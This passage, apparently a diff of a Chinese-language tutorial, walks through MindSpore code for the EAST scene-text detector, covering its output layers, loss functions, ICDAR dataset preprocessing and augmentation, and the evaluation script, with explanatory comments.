      self.conv1 = nn.Conv2d(1024, 128, 1, has_bias=True)
      self.bn1 = nn.BatchNorm2d(128)
      self.relu1 = nn.ReLU()
      self.conv2 = nn.Conv2d(
      128,
      128,
      3,
      padding=1,
      pad_mode='pad',
      has_bias=True)
      self.bn2 = nn.BatchNorm2d(128)
      self.relu2 = nn.ReLU()

      ……

      def construct(self, x, f1, f2, f3, f4):
      img_hight = P.Shape()(x)[2]
      img_width = P.Shape()(x)[3]

      out = P.ResizeBilinear((img_hight / 16, img_width / 16), True)(f4)
      out = self.concat((out, f3))
      out = self.relu1(self.bn1(self.conv1(out)))
      out = self.relu2(self.bn2(self.conv2(out)))

      out = P.ResizeBilinear((img_hight / 8, img_width / 8), True)(out)
      out = self.concat((out, f2))
      out = self.relu3(self.bn3(self.conv3(out)))
      out = self.relu4(self.bn4(self.conv4(out)))

      out = P.ResizeBilinear((img_hight / 4, img_width / 4), True)(out)
      out = self.concat((out, f1))
      out = self.relu5(self.bn5(self.conv5(out)))
      out = self.relu6(self.bn6(self.conv6(out)))

      out = self.relu7(self.bn7(self.conv7(out)))
      return out

      class Output
      -
      class Output(nn.Cell):
      def __init__(self, scope=512):
      super(Output, self).__init__()
      self.conv1 = nn.Conv2d(32, 1, 1)
      self.sigmoid1 = nn.Sigmoid()
      self.conv2 = nn.Conv2d(32, 4, 1)
      self.sigmoid2 = nn.Sigmoid()
      self.conv3 = nn.Conv2d(32, 1, 1)
      self.sigmoid3 = nn.Sigmoid()
      self.scope = scope
      self.concat = P.Concat(axis=1)
      self.PI = 3.1415926535898

      def construct(self, x):
      score = self.sigmoid1(self.conv1(x)) # 文本区域得分
      loc = self.sigmoid2(self.conv2(x)) * self.scope # 位置
      angle = (self.sigmoid3(self.conv3(x)) - 0.5) * self.PI # 倾斜角度
      geo = self.concat((loc, angle)) # 边界框信息包含位置和倾斜角度
      return score, geo # 最终返回文本区域得分和拼接后的边界框信息
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      class Output(nn.Cell):
      def __init__(self, scope=512):
      super(Output, self).__init__()
      self.conv1 = nn.Conv2d(32, 1, 1)
      self.sigmoid1 = nn.Sigmoid()
      self.conv2 = nn.Conv2d(32, 4, 1)
      self.sigmoid2 = nn.Sigmoid()
      self.conv3 = nn.Conv2d(32, 1, 1)
      self.sigmoid3 = nn.Sigmoid()
      self.scope = scope
      self.concat = P.Concat(axis=1)
      self.PI = 3.1415926535898

      def construct(self, x):
      score = self.sigmoid1(self.conv1(x)) # 文本区域得分
      loc = self.sigmoid2(self.conv2(x)) * self.scope # 位置
      angle = (self.sigmoid3(self.conv3(x)) - 0.5) * self.PI # 倾斜角度
      geo = self.concat((loc, angle)) # 边界框信息包含位置和倾斜角度
      return score, geo # 最终返回文本区域得分和拼接后的边界框信息

      class EastLossBlock
      @@ -1057,29 +1055,29 @@
      class EastLo

      在计算位置损失时,还需考虑训练集中的样本是否为真实文本区域,需将训练集中非文本区域处的位置信息、分类标注和对应的模型预测结果剔除掉,以避免这些数据对损失计算的干扰。

      最后将分类损失和位置损失加权求和,作为总体损失并返回。

      -
      class EastLossBlock(nn.Cell):
      def __init__(self):
      super(EastLossBlock, self).__init__()
      self.split = P.Split(1, 5)
      self.min = MyMin()
      self.log = P.Log()
      self.cos = P.Cos()
      self.mean = P.ReduceMean(keep_dims=False)
      self.sum = P.ReduceSum()
      self.eps = 1e-5
      self.dice = DiceCoefficient()

      def construct(
      self,
      y_true_cls,
      y_pred_cls,
      y_true_geo,
      y_pred_geo,
      training_mask):
      ans = self.sum(y_true_cls)
      # 将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失
      classification_loss = self.dice(
      y_true_cls, y_pred_cls * (1 - training_mask))

      # n * 5 * h * w
      # 将预测得到的位置信息和真实标注的位置信息分别拆分出来
      d1_gt, d2_gt, d3_gt, d4_gt, theta_gt = self.split(y_true_geo)
      d1_pred, d2_pred, d3_pred, d4_pred, theta_pred = self.split(y_pred_geo)
      area_gt = (d1_gt + d3_gt) * (d2_gt + d4_gt)
      area_pred = (d1_pred + d3_pred) * (d2_pred + d4_pred)
      w_union = self.min(d2_gt, d2_pred) + self.min(d4_gt, d4_pred)
      h_union = self.min(d1_gt, d1_pred) + self.min(d3_gt, d3_pred)

      area_intersect = w_union * h_union
      area_union = area_gt + area_pred - area_intersect
      # 通过计算交并比(IoU)和角度误差得到位置损失
      iou_loss_map = -self.log((area_intersect + 1.0) /
      (area_union + 1.0)) # iou_loss_map
      angle_loss_map = 1 - self.cos(theta_pred - theta_gt) # angle_loss_map

      # 角度误差使用余弦相似度计算
      angle_loss = self.sum(angle_loss_map * y_true_cls) / ans
      iou_loss = self.sum(iou_loss_map * y_true_cls) / ans
      geo_loss = 10 * angle_loss + iou_loss

      return geo_loss + classification_loss
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      class EastLossBlock(nn.Cell):
      def __init__(self):
      super(EastLossBlock, self).__init__()
      self.split = P.Split(1, 5)
      self.min = MyMin()
      self.log = P.Log()
      self.cos = P.Cos()
      self.mean = P.ReduceMean(keep_dims=False)
      self.sum = P.ReduceSum()
      self.eps = 1e-5
      self.dice = DiceCoefficient()

      def construct(
      self,
      y_true_cls,
      y_pred_cls,
      y_true_geo,
      y_pred_geo,
      training_mask):
      ans = self.sum(y_true_cls)
      # 将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失
      classification_loss = self.dice(
      y_true_cls, y_pred_cls * (1 - training_mask))

      # n * 5 * h * w
      # 将预测得到的位置信息和真实标注的位置信息分别拆分出来
      d1_gt, d2_gt, d3_gt, d4_gt, theta_gt = self.split(y_true_geo)
      d1_pred, d2_pred, d3_pred, d4_pred, theta_pred = self.split(y_pred_geo)
      area_gt = (d1_gt + d3_gt) * (d2_gt + d4_gt)
      area_pred = (d1_pred + d3_pred) * (d2_pred + d4_pred)
      w_union = self.min(d2_gt, d2_pred) + self.min(d4_gt, d4_pred)
      h_union = self.min(d1_gt, d1_pred) + self.min(d3_gt, d3_pred)

      area_intersect = w_union * h_union
      area_union = area_gt + area_pred - area_intersect
      # 通过计算交并比(IoU)和角度误差得到位置损失
      iou_loss_map = -self.log((area_intersect + 1.0) /
      (area_union + 1.0)) # iou_loss_map
      angle_loss_map = 1 - self.cos(theta_pred - theta_gt) # angle_loss_map

      # 角度误差使用余弦相似度计算
      angle_loss = self.sum(angle_loss_map * y_true_cls) / ans
      iou_loss = self.sum(iou_loss_map * y_true_cls) / ans
      geo_loss = 10 * angle_loss + iou_loss

      return geo_loss + classification_loss

      class EastWithLossCell
      -
      class EastWithLossCell(nn.Cell):
      def __init__(self, network):
      super(EastWithLossCell, self).__init__()
      # 传入一个EAST模型,作为计算图中的网络模块
      self.east_network = network
      # 实例化了EastLossBlock类,作为计算图中的损失函数模块
      self.loss = EastLossBlock()

      def construct(self, img, true_cls, true_geo, training_mask):
      '''
      img: 输入图片
      true_cls: 分类标注
      true_geo: 位置标注
      training_mask: 训练集中的掩码(用于过滤掉非真实文本区域的数据)
      '''
      # 调用计算图进行前向计算
      socre, geometry = self.east_network(img)
      # 将计算得到的分类得分和位置信息分别传给损失函数模块进行后向计算,得到整体的损失值并返回
      loss = self.loss(
      true_cls,
      socre,
      true_geo,
      geometry,
      training_mask)
      return loss
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      class EastWithLossCell(nn.Cell):
      def __init__(self, network):
      super(EastWithLossCell, self).__init__()
      # 传入一个EAST模型,作为计算图中的网络模块
      self.east_network = network
      # 实例化了EastLossBlock类,作为计算图中的损失函数模块
      self.loss = EastLossBlock()

      def construct(self, img, true_cls, true_geo, training_mask):
      '''
      img: 输入图片
      true_cls: 分类标注
      true_geo: 位置标注
      training_mask: 训练集中的掩码(用于过滤掉非真实文本区域的数据)
      '''
      # 调用计算图进行前向计算
      socre, geometry = self.east_network(img)
      # 将计算得到的分类得分和位置信息分别传给损失函数模块进行后向计算,得到整体的损失值并返回
      loss = self.loss(
      true_cls,
      socre,
      true_geo,
      geometry,
      training_mask)
      return loss

      src/dataset.py

      create_east_dataset()
      -
      def create_east_dataset(
      img_root,
      txt_root,
      batch_size,
      device_num,
      rank,
      is_training=True):
      # 实例化 ICDAREASTDataset 类,传入图片和文本标注的路径,用于读取并解析图像和标注
      east_data = ICDAREASTDataset(img_path=img_root, gt_path=txt_root)
      # 生成分布式采样器,用于在多个设备之间对数据进行划分和分发。
      distributed_sampler = DistributedSampler(
      len(east_data), device_num, 0 if device_num == 1 else rank, shuffle=True)

      trans_list = [CV.RandomColorAdjust(0.5, 0.5, 0.5, 0.25), # 随机改变图像的颜色饱和度、对比度和亮度
      CV.Rescale(1 / 255.0, 0), # 对图像进行缩放
      CV.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), # 图像正则化处理
      CV.HWC2CHW()] # 将图像的通道维度从 HWC(高×宽×通道数)顺序转换为 CHW(通道数×高×宽)顺序
      if is_training: # 如果是训练模式
      dataset_column_names = [
      "image", # 图像
      "score_map", # 分类标注分数图
      "geo_map", # 位置标注几何图
      "training_mask"] # 训练集掩码
      # 调用 MindSpore 中的 GeneratorDataset 类生成数据集
      ds = de.GeneratorDataset(
      east_data,
      column_names=dataset_column_names,
      num_parallel_workers=32, # 数据处理和增强过程中使用的并行线程数
      # sampler 参数则指定了数据采样器,即从数据集中选择数据样本的方式,
      # 本例中使用的是前面提到的分布式采样器 distributed_sampler
      sampler=distributed_sampler)
      # 调用 map()方法将数据集中的图像列传入变换列表中的操作进行增广
      ds = ds.map(
      operations=trans_list,
      input_columns=["image"],
      num_parallel_workers=8,
      python_multiprocessing=True)
      # 使用 batch()方法将批量大小对数据集进行划分
      ds = ds.batch(batch_size, num_parallel_workers=8, drop_remainder=True)

      return ds, len(east_data)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      def create_east_dataset(
      img_root,
      txt_root,
      batch_size,
      device_num,
      rank,
      is_training=True):
      # 实例化 ICDAREASTDataset 类,传入图片和文本标注的路径,用于读取并解析图像和标注
      east_data = ICDAREASTDataset(img_path=img_root, gt_path=txt_root)
      # 生成分布式采样器,用于在多个设备之间对数据进行划分和分发。
      distributed_sampler = DistributedSampler(
      len(east_data), device_num, 0 if device_num == 1 else rank, shuffle=True)

      trans_list = [CV.RandomColorAdjust(0.5, 0.5, 0.5, 0.25), # 随机改变图像的颜色饱和度、对比度和亮度
      CV.Rescale(1 / 255.0, 0), # 对图像进行缩放
      CV.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), # 图像正则化处理
      CV.HWC2CHW()] # 将图像的通道维度从 HWC(高×宽×通道数)顺序转换为 CHW(通道数×高×宽)顺序
      if is_training: # 如果是训练模式
      dataset_column_names = [
      "image", # 图像
      "score_map", # 分类标注分数图
      "geo_map", # 位置标注几何图
      "training_mask"] # 训练集掩码
      # 调用 MindSpore 中的 GeneratorDataset 类生成数据集
      ds = de.GeneratorDataset(
      east_data,
      column_names=dataset_column_names,
      num_parallel_workers=32, # 数据处理和增强过程中使用的并行线程数
      # sampler 参数则指定了数据采样器,即从数据集中选择数据样本的方式,
      # 本例中使用的是前面提到的分布式采样器 distributed_sampler
      sampler=distributed_sampler)
      # 调用 map()方法将数据集中的图像列传入变换列表中的操作进行增广
      ds = ds.map(
      operations=trans_list,
      input_columns=["image"],
      num_parallel_workers=8,
      python_multiprocessing=True)
      # 使用 batch()方法将批量大小对数据集进行划分
      ds = ds.batch(batch_size, num_parallel_workers=8, drop_remainder=True)

      return ds, len(east_data)

      class ICDAREASTDataset
      -
      class ICDAREASTDataset:
      def __init__(self, img_path, gt_path, scale=0.25, length=512):
      super(ICDAREASTDataset, self).__init__()
      self.img_files = [os.path.join(
      img_path,
      img_file) for img_file in sorted(os.listdir(img_path))]
      self.gt_files = [
      os.path.join(
      gt_path,
      gt_file) for gt_file in sorted(
      os.listdir(gt_path))]
      self.scale = scale # 缩放比例
      self.length = length # 裁剪后的图像长度

      def __getitem__(self, index):
      with open(self.gt_files[index], 'r') as f:
      lines = f.readlines()
      vertices, labels = extract_vertices(lines) # 从文本标注中提取文本区域的顶点坐标和标注

      img = Image.open(self.img_files[index]) # 读取图像
      img, vertices = adjust_height(img, vertices) # 调整高度
      img, vertices = rotate_img(img, vertices) # 随机旋转图像
      img, vertices = crop_img(img, vertices, labels, self.length) # 将图像切割成指定长度的大小
      score_map, geo_map, ignored_map = get_score_geo(
      img, vertices, labels, self.scale, self.length) # 分类标注分数图、位置标注几何图和忽略标注
      score_map = score_map.transpose(2, 0, 1)
      ignored_map = ignored_map.transpose(2, 0, 1)
      geo_map = geo_map.transpose(2, 0, 1)
      if np.sum(score_map) < 1:
      score_map[0, 0, 0] = 1
      return img, score_map, geo_map, ignored_map

      def __len__(self):
      return len(self.img_files)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      class ICDAREASTDataset:
      def __init__(self, img_path, gt_path, scale=0.25, length=512):
      super(ICDAREASTDataset, self).__init__()
      self.img_files = [os.path.join(
      img_path,
      img_file) for img_file in sorted(os.listdir(img_path))]
      self.gt_files = [
      os.path.join(
      gt_path,
      gt_file) for gt_file in sorted(
      os.listdir(gt_path))]
      self.scale = scale # 缩放比例
      self.length = length # 裁剪后的图像长度

      def __getitem__(self, index):
      with open(self.gt_files[index], 'r') as f:
      lines = f.readlines()
      vertices, labels = extract_vertices(lines) # 从文本标注中提取文本区域的顶点坐标和标注

      img = Image.open(self.img_files[index]) # 读取图像
      img, vertices = adjust_height(img, vertices) # 调整高度
      img, vertices = rotate_img(img, vertices) # 随机旋转图像
      img, vertices = crop_img(img, vertices, labels, self.length) # 将图像切割成指定长度的大小
      score_map, geo_map, ignored_map = get_score_geo(
      img, vertices, labels, self.scale, self.length) # 分类标注分数图、位置标注几何图和忽略标注
      score_map = score_map.transpose(2, 0, 1)
      ignored_map = ignored_map.transpose(2, 0, 1)
      geo_map = geo_map.transpose(2, 0, 1)
      if np.sum(score_map) < 1:
      score_map[0, 0, 0] = 1
      return img, score_map, geo_map, ignored_map

      def __len__(self):
      return len(self.img_files)

      extract_vertices()
      -
      def extract_vertices(lines):
      '''extract vertices info from txt lines
      Input:
      lines : list of string info 输入是一个字符串列表 lines,其中每个字符串包含了一个文本区域的信息,包括顶点坐标和标签等
      Output:
      vertices: vertices of text regions <numpy.ndarray, (n,8)> 所有文本区域的顶点坐标
      labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)> 标签
      '''
      labels = [] # 存储最终的标签
      vertices = [] # 存储顶点信息
      for line in lines:
      # 通过 rstrip()和 lstrip()函数去除其前后空格和 BOM(Byte Order Mark)等特殊字符,并使用 split()函数将其切分为一个包含八个整数的列表
      vertices.append(list(map(int, line.rstrip('\n').lstrip('\ufeff').split(',')[:8])))
      label = 0 if '###' in line else 1
      labels.append(label)
      # 返回顶点和标签的 numpy 数组
      return np.array(vertices), np.array(labels)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      def extract_vertices(lines):
      '''extract vertices info from txt lines
      Input:
      lines : list of string info 输入是一个字符串列表 lines,其中每个字符串包含了一个文本区域的信息,包括顶点坐标和标签等
      Output:
      vertices: vertices of text regions <numpy.ndarray, (n,8)> 所有文本区域的顶点坐标
      labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)> 标签
      '''
      labels = [] # 存储最终的标签
      vertices = [] # 存储顶点信息
      for line in lines:
      # 通过 rstrip()和 lstrip()函数去除其前后空格和 BOM(Byte Order Mark)等特殊字符,并使用 split()函数将其切分为一个包含八个整数的列表
      vertices.append(list(map(int, line.rstrip('\n').lstrip('\ufeff').split(',')[:8])))
      label = 0 if '###' in line else 1
      labels.append(label)
      # 返回顶点和标签的 numpy 数组
      return np.array(vertices), np.array(labels)

      adjust_height()
      -
      def adjust_height(img, vertices, ratio=0.2):
      '''adjust height of image to aug data
      Input:
      img : PIL Image
      vertices : vertices of text regions <numpy.ndarray, (n,8)>
      ratio : height changes in [0.8, 1.2]
      Output:
      img : adjusted PIL Image
      new_vertices: adjusted vertices
      '''
      ratio_h = 1 + ratio * (np.random.rand() * 2 - 1) # 随机调整输入图像的高度
      old_h = img.height
      # 根据输入的高度缩放比例ratio_h,计算调整后的图像新高度new_h。
      # 原始图像的高度由变量old_h指定,通过乘以缩放比例并四舍五入取整来得到调整后的高度。
      # np.around()函数是NumPy库中的一个函数,用于对数组进行四舍五入,其默认精度为0
      new_h = int(np.around(old_h * ratio_h))
      img = img.resize((img.width, new_h), Image.BILINEAR)

      new_vertices = vertices.copy()
      if vertices.size > 0:
      new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * (new_h / old_h)
      # 返回调整后的图像和更新后的顶点坐标
      return img, new_vertices
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      def adjust_height(img, vertices, ratio=0.2):
      '''adjust height of image to aug data
      Input:
      img : PIL Image
      vertices : vertices of text regions <numpy.ndarray, (n,8)>
      ratio : height changes in [0.8, 1.2]
      Output:
      img : adjusted PIL Image
      new_vertices: adjusted vertices
      '''
      ratio_h = 1 + ratio * (np.random.rand() * 2 - 1) # 随机调整输入图像的高度
      old_h = img.height
      # 根据输入的高度缩放比例ratio_h,计算调整后的图像新高度new_h。
      # 原始图像的高度由变量old_h指定,通过乘以缩放比例并四舍五入取整来得到调整后的高度。
      # np.around()函数是NumPy库中的一个函数,用于对数组进行四舍五入,其默认精度为0
      new_h = int(np.around(old_h * ratio_h))
      img = img.resize((img.width, new_h), Image.BILINEAR)

      new_vertices = vertices.copy()
      if vertices.size > 0:
      new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * (new_h / old_h)
      # 返回调整后的图像和更新后的顶点坐标
      return img, new_vertices

      rotate_img()
      -
      def rotate_img(img, vertices, angle_range=10):
      '''rotate image [-10, 10] degree to aug data
      Input:
      img : PIL Image
      vertices : vertices of text regions <numpy.ndarray, (n,8)>
      angle_range : rotate range
      Output:
      img : rotated PIL Image
      new_vertices: rotated vertices
      '''
      # 获得中心旋转点
      center_x = (img.width - 1) / 2
      center_y = (img.height - 1) / 2
      angle = angle_range * (np.random.rand() * 2 - 1)
      # 使用了 BILINEAR 滤波器来进行图像插值,以获得更好的旋转效果
      img = img.rotate(angle, Image.BILINEAR)
      # 定义一个大小为 vertices.shape 的全零 NumPy 数组 new_vertices,用于存储旋转后的顶点坐标
      new_vertices = np.zeros(vertices.shape)
      for i, vertice in enumerate(vertices):
      # 遍历每个文本区域的顶点坐标,调用 rotate_vertices()函数来计算旋转后的新坐标,然后将其保存到 new_vertices 中
      new_vertices[i, :] = rotate_vertices(
      vertice, -angle / 180 * math.pi, np.array([[center_x], [center_y]]))
      return img, new_vertices
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      def rotate_img(img, vertices, angle_range=10):
      '''rotate image [-10, 10] degree to aug data
      Input:
      img : PIL Image
      vertices : vertices of text regions <numpy.ndarray, (n,8)>
      angle_range : rotate range
      Output:
      img : rotated PIL Image
      new_vertices: rotated vertices
      '''
      # 获得中心旋转点
      center_x = (img.width - 1) / 2
      center_y = (img.height - 1) / 2
      angle = angle_range * (np.random.rand() * 2 - 1)
      # 使用了 BILINEAR 滤波器来进行图像插值,以获得更好的旋转效果
      img = img.rotate(angle, Image.BILINEAR)
      # 定义一个大小为 vertices.shape 的全零 NumPy 数组 new_vertices,用于存储旋转后的顶点坐标
      new_vertices = np.zeros(vertices.shape)
      for i, vertice in enumerate(vertices):
      # 遍历每个文本区域的顶点坐标,调用 rotate_vertices()函数来计算旋转后的新坐标,然后将其保存到 new_vertices 中
      new_vertices[i, :] = rotate_vertices(
      vertice, -angle / 180 * math.pi, np.array([[center_x], [center_y]]))
      return img, new_vertices

      crop_img()
      -
      def crop_img(img, vertices, labels, length):
      '''crop img patches to obtain batch and augment
      Input:
      img : PIL Image
      vertices : vertices of text regions <numpy.ndarray, (n,8)>
      labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
      length : length of cropped image region
      Output:
      region : cropped image region
      new_vertices: new vertices in cropped region
      '''
      # 获取原始图像的高度h和宽度w
      h, w = img.height, img.width
      # confirm the shortest side of image >= length
      # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
      if h >= w and w < length:
      img = img.resize((length, int(h * length / w)), Image.BILINEAR)
      elif h < w and h < length:
      img = img.resize((int(w * length / h), length), Image.BILINEAR)
      ratio_w = img.width / w
      ratio_h = img.height / h
      assert (ratio_w >= 1 and ratio_h >= 1)

      # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
      new_vertices = np.zeros(vertices.shape)
      if vertices.size > 0:
      new_vertices[:, [0, 2, 4, 6]] = vertices[:, [0, 2, 4, 6]] * ratio_w
      new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * ratio_h

      # find random position
      # 生成随机的裁剪位置,检查裁剪区域是否与文本区域相交,避免将裁剪区域中的文本区域遮盖或截断
      remain_h = img.height - length
      remain_w = img.width - length
      flag = True
      cnt = 0
      while flag and cnt < 1000:
      # 若随机裁剪的位置与文本区域有交集,则继续生成新的随机位置,
      # 直到找到一个合适的位置或者超过最大尝试次数1000次为止
      cnt += 1
      start_w = int(np.random.rand() * remain_w)
      start_h = int(np.random.rand() * remain_h)
      flag = is_cross_text([start_w, start_h], length,
      new_vertices[labels == 1, :])
      box = (start_w, start_h, start_w + length, start_h + length)
      # 使用PIL库提供的crop()方法从原始图像中截取指定大小的区域,并将其作为本函数的输出返回。
      region = img.crop(box)
      if new_vertices.size == 0:
      # 如果不存在任何文本区域,则直接返回裁剪后的图像区域和空的新顶点坐标
      return region, new_vertices
      # 更新文本区域的顶点坐标。将新的裁剪图像左上角的坐标(start_w, start_h)作为原点,计算相对于这个原点的顶点坐标,并将这个相对坐标赋值给new_vertices
      new_vertices[:, [0, 2, 4, 6]] -= start_w
      new_vertices[:, [1, 3, 5, 7]] -= start_h
      return region, new_vertices
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      def crop_img(img, vertices, labels, length):
      '''crop img patches to obtain batch and augment
      Input:
      img : PIL Image
      vertices : vertices of text regions <numpy.ndarray, (n,8)>
      labels : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
      length : length of cropped image region
      Output:
      region : cropped image region
      new_vertices: new vertices in cropped region
      '''
      # 获取原始图像的高度h和宽度w
      h, w = img.height, img.width
      # confirm the shortest side of image >= length
      # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
      if h >= w and w < length:
      img = img.resize((length, int(h * length / w)), Image.BILINEAR)
      elif h < w and h < length:
      img = img.resize((int(w * length / h), length), Image.BILINEAR)
      ratio_w = img.width / w
      ratio_h = img.height / h
      assert (ratio_w >= 1 and ratio_h >= 1)

      # 如果其中较小的一边小于指定的裁剪长度,则使用PIL库提供的resize()方法将图像缩放到相应的大小
      new_vertices = np.zeros(vertices.shape)
      if vertices.size > 0:
      new_vertices[:, [0, 2, 4, 6]] = vertices[:, [0, 2, 4, 6]] * ratio_w
      new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * ratio_h

      # find random position
      # 生成随机的裁剪位置,检查裁剪区域是否与文本区域相交,避免将裁剪区域中的文本区域遮盖或截断
      remain_h = img.height - length
      remain_w = img.width - length
      flag = True
      cnt = 0
      while flag and cnt < 1000:
      # 若随机裁剪的位置与文本区域有交集,则继续生成新的随机位置,
      # 直到找到一个合适的位置或者超过最大尝试次数1000次为止
      cnt += 1
      start_w = int(np.random.rand() * remain_w)
      start_h = int(np.random.rand() * remain_h)
      flag = is_cross_text([start_w, start_h], length,
      new_vertices[labels == 1, :])
      box = (start_w, start_h, start_w + length, start_h + length)
      # 使用PIL库提供的crop()方法从原始图像中截取指定大小的区域,并将其作为本函数的输出返回。
      region = img.crop(box)
      if new_vertices.size == 0:
      # 如果不存在任何文本区域,则直接返回裁剪后的图像区域和空的新顶点坐标
      return region, new_vertices
      # 更新文本区域的顶点坐标。将新的裁剪图像左上角的坐标(start_w, start_h)作为原点,计算相对于这个原点的顶点坐标,并将这个相对坐标赋值给new_vertices
      new_vertices[:, [0, 2, 4, 6]] -= start_w
      new_vertices[:, [1, 3, 5, 7]] -= start_h
      return region, new_vertices

      eval.py

      先使用 argparse 设置一堆参数:

      @@ -1119,28 +1117,28 @@

      -
      context.set_context(
      mode=context.GRAPH_MODE, # 图模式
      device_target=args.device_target, # 设备类型
      save_graphs=False, # 是否保存计算图
      device_id=args.device_num) # 设备编号
      +
      1
      2
      3
      4
      5
      context.set_context(
      mode=context.GRAPH_MODE, # 图模式
      device_target=args.device_target, # 设备类型
      save_graphs=False, # 是否保存计算图
      device_id=args.device_num) # 设备编号

      main

      设置一下模型、数据集、保存路径、开跑!

      -
      if __name__ == '__main__':
      model_name = args.checkpoint_path
      test_img_path = args.test_img_path
      submit_path = './submit'
      eval_model(model_name, test_img_path, submit_path)
      +
      1
      2
      3
      4
      5
      if __name__ == '__main__':
      model_name = args.checkpoint_path
      test_img_path = args.test_img_path
      submit_path = './submit'
      eval_model(model_name, test_img_path, submit_path)

      eval_model()
      -
      def eval_model(name, img_path, submit, save_flag=True):
      '''
      name: 模型的 checkpoint 文件路径
      img_path: 测试集图片所在的文件夹路径
      submit: 输出结果保存的文件夹路径
      save_flag: 是否保存中间结果
      '''
      # 判断输出结果保存的目录是否存在,如果存在则删除该目录及其子目录,然后重新创建一个同名目录
      if os.path.exists(submit):
      shutil.rmtree(submit)
      os.mkdir(submit)
      # 构建 EAST 模型
      network = EAST()
      # 加载预训练权重参数
      param_dict = load_checkpoint(name)
      load_param_into_net(network, param_dict)
      # 设置模型为训练模式
      network.set_train(True)

      start_time = time.time()
      # 调用 detect_dataset()函数对测试集图片进行检测,并将检测结果保存到指定的输出目录 submit 中
      detect_dataset(network, img_path, submit)
      os.chdir(submit)
      res = subprocess.getoutput('zip -q submit.zip *.txt')
      res = subprocess.getoutput('mv submit.zip ../')
      os.chdir('../')
      # 调用评估脚本./evaluate/script.py 来计算模型的性能指标,评估结果保存在字符串变量 res 中
      res = subprocess.getoutput(
      'python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
      print(res)
      os.remove('./submit.zip')
      print('eval time is {}'.format(time.time() - start_time))

      if not save_flag:
      # 如果 save_flag 为 False,则删除输出目录及其子目录(闻到了屎山的味道)
      shutil.rmtree(submit)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      def eval_model(name, img_path, submit, save_flag=True):
      '''
      name: 模型的 checkpoint 文件路径
      img_path: 测试集图片所在的文件夹路径
      submit: 输出结果保存的文件夹路径
      save_flag: 是否保存中间结果
      '''
      # 判断输出结果保存的目录是否存在,如果存在则删除该目录及其子目录,然后重新创建一个同名目录
      if os.path.exists(submit):
      shutil.rmtree(submit)
      os.mkdir(submit)
      # 构建 EAST 模型
      network = EAST()
      # 加载预训练权重参数
      param_dict = load_checkpoint(name)
      load_param_into_net(network, param_dict)
      # 设置模型为训练模式
      network.set_train(True)

      start_time = time.time()
      # 调用 detect_dataset()函数对测试集图片进行检测,并将检测结果保存到指定的输出目录 submit 中
      detect_dataset(network, img_path, submit)
      os.chdir(submit)
      res = subprocess.getoutput('zip -q submit.zip *.txt')
      res = subprocess.getoutput('mv submit.zip ../')
      os.chdir('../')
      # 调用评估脚本./evaluate/script.py 来计算模型的性能指标,评估结果保存在字符串变量 res 中
      res = subprocess.getoutput(
      'python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
      print(res)
      os.remove('./submit.zip')
      print('eval time is {}'.format(time.time() - start_time))

      if not save_flag:
      # 如果 save_flag 为 False,则删除输出目录及其子目录(闻到了屎山的味道)
      shutil.rmtree(submit)

      detect.py

      detect_dataset()
      -
      def detect_dataset(model, test_img_path, submit_path):
      """
      detection on whole dataset, save .txt results in submit_path
      Input:
      model : detection model 模型实例
      device : gpu if gpu is available
      test_img_path: dataset path 测试图片所在文件夹的路径
      submit_path : submit result for evaluation 提交结果保存路径
      """
      # 读取测试集中所有的图片,并按照文件名排序
      img_files = os.listdir(test_img_path)
      img_files = sorted([os.path.join(test_img_path, img_file)
      for img_file in img_files])

      for i, img_file in enumerate(img_files):
